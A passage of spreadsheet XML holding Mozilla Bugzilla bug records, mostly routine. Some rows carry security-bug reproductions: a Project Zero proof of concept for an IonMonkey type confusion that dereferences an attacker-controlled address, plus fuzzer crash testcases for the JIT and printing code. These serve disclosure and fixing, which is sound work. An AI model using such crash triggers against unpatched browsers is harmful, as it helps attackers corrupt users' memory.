          <t>Assertion failure: NS_IsMainThread() and crash [@mozilla::image::Decoder::AllocateFrame]</t>
        </is>
      </c>
      <c r="D3600" t="inlineStr">
        <is>
          <t>2015-10-06 17:25:39 -0700</t>
        </is>
      </c>
      <c r="E3600" t="n">
        <v>1</v>
      </c>
      <c r="F3600" t="n">
        <v>1</v>
      </c>
      <c r="G3600" t="n">
        <v>3</v>
      </c>
      <c r="H3600" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3600" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3600" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3600" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3600" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3600" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3600" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3600" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3600" t="inlineStr">
        <is>
          <t>[fuzzblocker][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q3600" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3600" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3600" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T3600" t="n">
        <v>1</v>
      </c>
      <c r="U3600" t="n">
        <v>0</v>
      </c>
      <c r="V3600" t="n">
        <v>55</v>
      </c>
      <c r="W3600" t="inlineStr">
        <is>
          <t>Created attachment 778962
callstack.txt
Load the attached testcase and click the "Ok" button for every two popup boxes, then wait a few seconds.
Assertion failure: NS_IsMainThread(), at /Users/cdiehl/dev/repos/mozilla/mozilla-inbound/image/src/Decoder.cpp:197
Tested with http://hg.mozilla.org/integration/mozilla-inbound/rev/9fd04fd70fc2</t>
        </is>
      </c>
      <c r="X3600" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3601">
      <c r="A3601" t="n">
        <v>1212951</v>
      </c>
      <c r="B3601" t="inlineStr">
        <is>
          <t>2015-10-08 10:19:25 -0700</t>
        </is>
      </c>
      <c r="C3601" t="inlineStr">
        <is>
          <t>The Credentials model appears as "Credentialss" in the admin panel</t>
        </is>
      </c>
      <c r="D3601" t="inlineStr">
        <is>
          <t>2015-10-10 15:00:08 -0700</t>
        </is>
      </c>
      <c r="E3601" t="n">
        <v>1</v>
      </c>
      <c r="F3601" t="n">
        <v>1</v>
      </c>
      <c r="G3601" t="n">
        <v>7</v>
      </c>
      <c r="H3601" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3601" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3601" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K3601" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3601" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3601" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3601" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3601" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3601" t="inlineStr"/>
      <c r="Q3601" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3601" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3601" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3601" t="n">
        <v>1</v>
      </c>
      <c r="U3601" t="n">
        <v>0</v>
      </c>
      <c r="V3601" t="n">
        <v>4</v>
      </c>
      <c r="W3601" t="inlineStr">
        <is>
          <t>Since otherwise it appears as "Credentialss" in the admin panel.
My bad for missing the model/table was plural during review.
It's not exactly critical, but if we don't change it now, it may be harder later when we have more people using Hawk credentials.
Guess we have two options:
1) Rename in code, then use migrations file
2) Create a new model, deploy, add "treeherder-etl" to that, switch in-repo code to use the new model, remove old model.</t>
        </is>
      </c>
      <c r="X3601" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3602">
      <c r="A3602" t="n">
        <v>1473830</v>
      </c>
      <c r="B3602" t="inlineStr">
        <is>
          <t>2018-07-06 01:43:22 -0700</t>
        </is>
      </c>
      <c r="C3602" t="inlineStr">
        <is>
          <t>Differential Testing: Different output message involving forEach</t>
        </is>
      </c>
      <c r="D3602" t="inlineStr">
        <is>
          <t>2020-04-06 02:05:37 -0700</t>
        </is>
      </c>
      <c r="E3602" t="n">
        <v>1</v>
      </c>
      <c r="F3602" t="n">
        <v>1</v>
      </c>
      <c r="G3602" t="n">
        <v>3</v>
      </c>
      <c r="H3602" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3602" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3602" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3602" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3602" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3602" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3602" t="inlineStr">
        <is>
          <t>[fuzzblocker][post-critsmash-triage][adv-main66-]</t>
        </is>
      </c>
      <c r="Q3602" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3602" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3602" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T3602" t="n">
        <v>1</v>
      </c>
      <c r="U3602" t="n">
        <v>0</v>
      </c>
      <c r="V3602" t="n">
        <v>26</v>
      </c>
      <c r="W3602" t="inlineStr">
        <is>
          <t>x = [];
y = [];
for (var i = 0; i &lt; 99; ++i) {
    x.push(null, 1);
}
x.sort();
y.forEach(function() {});
Array.prototype.reverse.call(x);
x.forEach(function(j) {
    if (j) {
        Array.prototype.forEach.call(x, function() {});
    }
    this.t = Int8Array;
}, 0);
print(uneval(this.t));
$ ./js-dbg-64-dm-linux-afdeb0288690 --fuzzing-safe --no-threads testcase.js 
function Int8Array() {
    [native code]
}
$ ./js-dbg-64-dm-linux-afdeb0288690 --fuzzing-safe --no-threads --no-baseline --no-ion testcase.js 
(void 0)
Tested this on m-c rev afdeb0288690.
My configure flags are:
'AR=ar' 'sh' '/home/ubuntu/trees/mozilla-central/js/src/configure' '--enable-debug' '--enable-more-deterministic' '--with-ccache' '--enable-gczeal' '--enable-debug-symbols' '--disable-tests'
python -u -m funfuzz.js.compile_shell -b "--enable-debug --enable-more-deterministic" -r afdeb0288690
Bisection underway...
Setting s-s as a start because TypedArrays are involved.</t>
        </is>
      </c>
      <c r="X3602" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3603">
      <c r="A3603" t="n">
        <v>822910</v>
      </c>
      <c r="B3603" t="inlineStr">
        <is>
          <t>2012-12-18 17:15:24 -0800</t>
        </is>
      </c>
      <c r="C3603" t="inlineStr">
        <is>
          <t>Crash [@ nsTextFrame::HasTerminalNewline()] with splitText, floating :first-letter</t>
        </is>
      </c>
      <c r="D3603" t="inlineStr">
        <is>
          <t>2014-10-24 18:31:12 -0700</t>
        </is>
      </c>
      <c r="E3603" t="n">
        <v>1</v>
      </c>
      <c r="F3603" t="n">
        <v>1</v>
      </c>
      <c r="G3603" t="n">
        <v>3</v>
      </c>
      <c r="H3603" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3603" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3603" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3603" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3603" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3603" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3603" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3603" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3603" t="inlineStr">
        <is>
          <t>[fuzzblocker][adv-main21+]</t>
        </is>
      </c>
      <c r="Q3603" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3603" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3603" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T3603" t="n">
        <v>1</v>
      </c>
      <c r="U3603" t="n">
        <v>0</v>
      </c>
      <c r="V3603" t="n">
        <v>15</v>
      </c>
      <c r="W3603" t="inlineStr">
        <is>
          <t>Created attachment 693696
testcase
###!!! ASSERTION: negative length: 'GetContentEnd() - mContentOffset &gt;= 0', file nsTextFrame.h, line 420
###!!! ASSERTION: bad index: 'uint32_t(aIndex) &lt; mState.mLength', file nsTextFragment.h, line 161
Crash [@ nsTextFrame::HasTerminalNewline()]
Oddly enough, Breakpad debug-opt shows this as a -1 deref (dangerous), while ASan opt shows it as a 0 deref (safe).</t>
        </is>
      </c>
      <c r="X3603" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3604">
      <c r="A3604" t="n">
        <v>21583</v>
      </c>
      <c r="B3604" t="inlineStr">
        <is>
          <t>1999-12-13 09:37:40 -0800</t>
        </is>
      </c>
      <c r="C3604" t="inlineStr">
        <is>
          <t>[RFE] Buzilla attachments should say what kind of file they are</t>
        </is>
      </c>
      <c r="D3604" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E3604" t="n">
        <v>1</v>
      </c>
      <c r="F3604" t="n">
        <v>1</v>
      </c>
      <c r="G3604" t="n">
        <v>4</v>
      </c>
      <c r="H3604" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3604" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3604" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K3604" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3604" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3604" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N3604" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3604" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3604" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="Q3604" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3604" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3604" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T3604" t="n">
        <v>1</v>
      </c>
      <c r="U3604" t="n">
        <v>1</v>
      </c>
      <c r="V3604" t="n">
        <v>14</v>
      </c>
      <c r="W3604" t="inlineStr">
        <is>
          <t>When an attachment has a description like "test case", it is impossible to
figure out what kind of file it is without clicking it. Would be nice if it
included the MIME type or file extension next to each attachment.</t>
        </is>
      </c>
      <c r="X3604" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3605">
      <c r="A3605" t="n">
        <v>1544386</v>
      </c>
      <c r="B3605" t="inlineStr">
        <is>
          <t>2019-04-15 04:19:13 -0700</t>
        </is>
      </c>
      <c r="C3605" t="inlineStr">
        <is>
          <t>Spidermonkey: IonMonkey incorrectly predicts return type of Array.prototype.pop, leading to type confusions</t>
        </is>
      </c>
      <c r="D3605" t="inlineStr">
        <is>
          <t>2020-11-03 01:59:22 -0800</t>
        </is>
      </c>
      <c r="E3605" t="n">
        <v>1</v>
      </c>
      <c r="F3605" t="n">
        <v>1</v>
      </c>
      <c r="G3605" t="n">
        <v>3</v>
      </c>
      <c r="H3605" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3605" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3605" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3605" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L3605" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3605" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3605" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3605" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3605" t="inlineStr"/>
      <c r="Q3605" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3605" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3605" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T3605" t="n">
        <v>1</v>
      </c>
      <c r="U3605" t="n">
        <v>0</v>
      </c>
      <c r="V3605" t="n">
        <v>34</v>
      </c>
      <c r="W3605" t="inlineStr">
        <is>
          <t>The following program (found through fuzzing and manually modified) crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 (current stable):
    // Run with --no-threads for increased reliability
    const v4 = [{a: 0}, {a: 1}, {a: 2}, {a: 3}, {a: 4}];
    function v7(v8,v9) {
        if (v4.length == 0) {
            v4[3] = {a: 5};
        }
        // pop the last value. IonMonkey will, based on inferred types, conclude that the result
        // will always be an object, which is untrue when  p[0] is fetched here.
        const v11 = v4.pop();
        // Then if will crash here when dereferencing a controlled double value as pointer.
        v11.a;
        // Force JIT compilation.
        for (let v15 = 0; v15 &lt; 10000; v15++) {}
    }
    var p = {};
    p.__proto__ = [{a: 0}, {a: 1}, {a: 2}];
    p[0] = -1.8629373288622089e-06;
    v4.__proto__ = p;
    for (let v31 = 0; v31 &lt; 1000; v31++) {
        v7();
    }
When run, it produces a crash similar to the following:
    * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
        frame #0: 0x000025a3b99b26cb
    -&gt;  0x25a3b99b26cb: cmp    qword ptr [rax], r11
        0x25a3b99b26ce: jne    0x25a3b99b26dd
        0x25a3b99b26d4: cmovne rax, rcx
        0x25a3b99b26d8: jmp    0x25a3b99b26f4
    Target 0: (js) stopped.
    (lldb) reg read rax
         rax = 0x4141414141414141
I haven't thoroughly analyzed bug, but here is roughly what appears to be happening:
* when v4 is created, it will have inferred types for its elements, indicating that they will be JSObjects (this can be seen by running the spidermonkey shell with `INFERFLAGS=full` in the environment)
* in the block following the function definition, v4's prototype is changed to a new object with a double as element 0. This does not change the inferred element types of v4, presumably because these only track own properties/elements and not from prototypes
* v7 is executed a few times and all original elements from v4 are popped
* the element assignment (`v4[3] = ...`) changes the length of the array (to 4) without changing the inferred element types
Afterwards, v7 is (re-)compiled by IonMonkey:
* the call to v4.pop() is inlined by IonMonkey and converted to an MArrayPopShift instruction [1]
* since the inferred element types (JSObjects) match the observed types, no type barrier is emitted [2, 3]
* IonMonkey now assumes that the result of v4.pop() will be an object, thus omits type checks and directly proceed with the property load
* Later, when generating machine code for v4.pop [4], IonMonkey generates a call to the runtime function ArrayPopDense [5]
At execution time of the JITed code, when v4.length is back at 1 (and so the only element left to pop is element 0), the following happens:
* The runtime call to ArrayPopDense is taken
* this calls js::array_pop which in turn proceeds to load p[0] as v4 doesn't have a property with name '0'
* the array pop operation thus returns a double value
However, the JITed code still assumes that it received a JSObject* from the array pop operation and goes on to dereference the value, leading to a crash at an attacker controlled address. It is likely possible to exploit this bug further as type inference issues are generally well exploitable.
To summarize, the problem seems to be that the code handling Array.pop in IonMonkey doesn't take into account that Array.prototype.pop can load an element from the prototype, which could conflict with the array's inferred element types.
Please note: this bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
With any fix, please give credit for identifying the vulnerability to Samuel Groß of Google Project Zero.
[1] https://github.com/mozilla/gecko-dev/blob/83bea62461d1e30aebef5077462fafb256368e9e/js/src/jit/MCallOptimize.cpp#L885
[2] https://github.com/mozilla/gecko-dev/blob/83bea62461d1e30aebef5077462fafb256368e9e/js/src/jit/MCallOptimize.cpp#L945
[3] https://github.com/mozilla/gecko-dev/blob/83bea62461d1e30aebef5077462fafb256368e9e/js/src/jit/MIR.cpp#L5836
[4] https://github.com/mozilla/gecko-dev/blob/83bea62461d1e30aebef5077462fafb256368e9e/js/src/jit/CodeGenerator.cpp#L9891
[5] https://github.com/mozilla/gecko-dev/blob/83bea62461d1e30aebef5077462fafb256368e9e/js/src/jit/VMFunctions.cpp#L430</t>
        </is>
      </c>
      <c r="X3605" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3606">
      <c r="A3606" t="n">
        <v>462217</v>
      </c>
      <c r="B3606" t="inlineStr">
        <is>
          <t>2008-10-29 13:30:25 -0700</t>
        </is>
      </c>
      <c r="C3606" t="inlineStr">
        <is>
          <t>mobile builds need a clobber</t>
        </is>
      </c>
      <c r="D3606" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3606" t="n">
        <v>1</v>
      </c>
      <c r="F3606" t="n">
        <v>1</v>
      </c>
      <c r="G3606" t="n">
        <v>5</v>
      </c>
      <c r="H3606" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3606" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3606" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3606" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3606" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3606" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3606" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3606" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3606" t="inlineStr"/>
      <c r="Q3606" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3606" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3606" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3606" t="n">
        <v>1</v>
      </c>
      <c r="U3606" t="n">
        <v>0</v>
      </c>
      <c r="V3606" t="n">
        <v>2</v>
      </c>
      <c r="W3606" t="inlineStr">
        <is>
          <t>Since 21:53:51 yesterday, we're getting
eval eval /builds/scratchbox/sbin/chroot-uid /builds/scratchbox/users/cltbld /scratchbox/tools/bin/env - $SBENV /scratchbox/tools/bin/bash -l /scratchbox/tools/bin/exec.sh build/mozilla-central hg pull -u
pulling from http://hg.mozilla.org/mozilla-central
searching for changes
adding changesets
adding manifests
adding file changes
added 12 changesets with 37 changes to 37 files
this update spans a branch affecting the following files:
 &lt;long list of files&gt;
aborting update spanning branches!
(use 'hg merge' to merge across branches or 'hg update -C' to lose changes)
program finished with exit code 1
The checkin that caused this is 
  http://hg.mozilla.org/mozilla-central/rev/945ee52fc955a030970a1483f9c7cb58dfbde0c7
which looks OK (ie doesn't add a new head). We should just go round the machines an clobber.</t>
        </is>
      </c>
      <c r="X3606" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3607">
      <c r="A3607" t="n">
        <v>1540705</v>
      </c>
      <c r="B3607" t="inlineStr">
        <is>
          <t>2019-04-01 06:29:08 -0700</t>
        </is>
      </c>
      <c r="C3607" t="inlineStr">
        <is>
          <t>add CODE_OF_CONDUCT.md</t>
        </is>
      </c>
      <c r="D3607" t="inlineStr">
        <is>
          <t>2019-04-02 13:08:51 -0700</t>
        </is>
      </c>
      <c r="E3607" t="n">
        <v>1</v>
      </c>
      <c r="F3607" t="n">
        <v>1</v>
      </c>
      <c r="G3607" t="n">
        <v>4</v>
      </c>
      <c r="H3607" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3607" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3607" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3607" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3607" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3607" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3607" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3607" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3607" t="inlineStr"/>
      <c r="Q3607" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3607" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3607" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3607" t="n">
        <v>1</v>
      </c>
      <c r="U3607" t="n">
        <v>0</v>
      </c>
      <c r="V3607" t="n">
        <v>15</v>
      </c>
      <c r="W3607" t="inlineStr">
        <is>
          <t>Recently, the Mozilla standard for CODE_OF_CONDUCT.md was enforced with a bot where it added a bunch of PRs to repositories across the org. We want the code of conduct to be visible to users regardless of how they initially interact with Socorro/Crash Stats.
The CODE_OF_CONDUCT.md file has to be Markdown and it has to be at the root of the repository. Further, the text can change, so we don't want to copy the text around or convert it to another format. We need to do some additional work to make it visible in the appropriate places.
This bug covers:
1. reopening and landing https://github.com/mozilla-services/socorro/pull/4864
2. deleting our CODE_OF_CONDUCT.rst file
3. adding text to the README and Crash Stats footer linking to the CODE_OF_CONDUCT.md file in GitHub</t>
        </is>
      </c>
      <c r="X3607" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3608">
      <c r="A3608" t="n">
        <v>526765</v>
      </c>
      <c r="B3608" t="inlineStr">
        <is>
          <t>2009-11-05 07:17:57 -0800</t>
        </is>
      </c>
      <c r="C3608" t="inlineStr">
        <is>
          <t>Not translated elements in 0.8</t>
        </is>
      </c>
      <c r="D3608" t="inlineStr">
        <is>
          <t>2018-09-24 14:26:41 -0700</t>
        </is>
      </c>
      <c r="E3608" t="n">
        <v>1</v>
      </c>
      <c r="F3608" t="n">
        <v>1</v>
      </c>
      <c r="G3608" t="n">
        <v>2</v>
      </c>
      <c r="H3608" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3608" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3608" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K3608" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3608" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3608" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3608" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3608" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3608" t="inlineStr"/>
      <c r="Q3608" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3608" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3608" t="inlineStr">
        <is>
          <t>1.0 beta1</t>
        </is>
      </c>
      <c r="T3608" t="n">
        <v>0</v>
      </c>
      <c r="U3608" t="n">
        <v>0</v>
      </c>
      <c r="V3608" t="n">
        <v>5</v>
      </c>
      <c r="W3608" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.6pre) Gecko/20091103 Shiretoko/3.5.6pre (.NET CLR 3.5.30729)
Build Identifier: 
In the GUI are some not translated elements. See attached images.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3608" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3609">
      <c r="A3609" t="n">
        <v>667092</v>
      </c>
      <c r="B3609" t="inlineStr">
        <is>
          <t>2011-06-24 15:35:53 -0700</t>
        </is>
      </c>
      <c r="C3609" t="inlineStr">
        <is>
          <t>Crash [@ DocumentViewerImpl::Print] with onbeforeprint</t>
        </is>
      </c>
      <c r="D3609" t="inlineStr">
        <is>
          <t>2011-11-14 18:55:37 -0800</t>
        </is>
      </c>
      <c r="E3609" t="n">
        <v>1</v>
      </c>
      <c r="F3609" t="n">
        <v>1</v>
      </c>
      <c r="G3609" t="n">
        <v>3</v>
      </c>
      <c r="H3609" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3609" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3609" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K3609" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3609" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3609" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3609" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3609" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3609" t="inlineStr">
        <is>
          <t>[sg:critical?] [landed m-c 7/01] [dveditz nom'd] [qa!]</t>
        </is>
      </c>
      <c r="Q3609" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3609" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3609" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T3609" t="n">
        <v>1</v>
      </c>
      <c r="U3609" t="n">
        <v>0</v>
      </c>
      <c r="V3609" t="n">
        <v>13</v>
      </c>
      <c r="W3609" t="inlineStr">
        <is>
          <t>Created attachment 541835
testcase
See testcase, which crashes current trunk build. I guess a regression of bug 307258.
https://crash-stats.mozilla.com/report/index/bp-19109731-87bb-4b70-b586-98d902110624
0 	xul.dll 	DocumentViewerImpl::Print 	layout/base/nsDocumentViewer.cpp:3694
1 	xul.dll 	nsGlobalWindow::Print 	dom/base/nsGlobalWindow.cpp:5112
2 	xul.dll 	nsGlobalWindow::Print 	dom/base/nsGlobalWindow.cpp:5077
3 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:102
4 	xul.dll 	XPC_WN_CallMethod 	js/src/xpconnect/src/xpcwrappednativejsops.cpp:1607
5 	mozjs.dll 	js::Invoke 	js/src/jsinterp.cpp:656
6 	mozjs.dll 	js::Interpret 	js/src/jsinterp.cpp:4550
7 	mozjs.dll 	js::RunScript 	js/src/jsinterp.cpp:613
8 	mozjs.dll 	js::Invoke 	js/src/jsinterp.cpp:686
9 	mozjs.dll 	js::ExternalInvoke 	js/src/jsinterp.cpp:805
10 	mozjs.dll 	JS_CallFunctionValue 	js/src/jsapi.cpp:5098
11 	xul.dll 	nsJSContext::CallEventHandler 	dom/base/nsJSEnvironment.cpp:1900
12 	xul.dll 	nsGlobalWindow::RunTimeout 	dom/base/nsGlobalWindow.cpp:9211
13 	xul.dll 	nsGlobalWindow::TimerCallback 	dom/base/nsGlobalWindow.cpp:9552
14 	xul.dll 	nsTimerImpl::Fire 	xpcom/threads/nsTimerImpl.cpp:424
15 	xul.dll 	nsTimerEvent::Run 	xpcom/threads/nsTimerImpl.cpp:520
16 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:618
17 	xul.dll 	mozilla::ipc::MessagePump::Run 	ipc/glue/MessagePump.cpp:110
18 	xul.dll 	xul.dll@0xb6560f 
etc..
The iframe content is this:
&lt;script&gt;
setTimeout(function() {window.print();}, 10);
&lt;/script&gt;
&lt;frameset onbeforeprint="window.frameElement.parentNode.removeChild(window.frameElement)"&gt;&lt;/frameset&gt;"</t>
        </is>
      </c>
      <c r="X3609" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3610">
      <c r="A3610" t="n">
        <v>980537</v>
      </c>
      <c r="B3610" t="inlineStr">
        <is>
          <t>2014-03-06 13:41:41 -0800</t>
        </is>
      </c>
      <c r="C3610" t="inlineStr">
        <is>
          <t>mozJSComponentLoader::mThisObjects is not properly rooted</t>
        </is>
      </c>
      <c r="D3610" t="inlineStr">
        <is>
          <t>2015-08-30 12:01:10 -0700</t>
        </is>
      </c>
      <c r="E3610" t="n">
        <v>1</v>
      </c>
      <c r="F3610" t="n">
        <v>1</v>
      </c>
      <c r="G3610" t="n">
        <v>3</v>
      </c>
      <c r="H3610" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3610" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3610" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3610" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3610" t="inlineStr">
        <is>
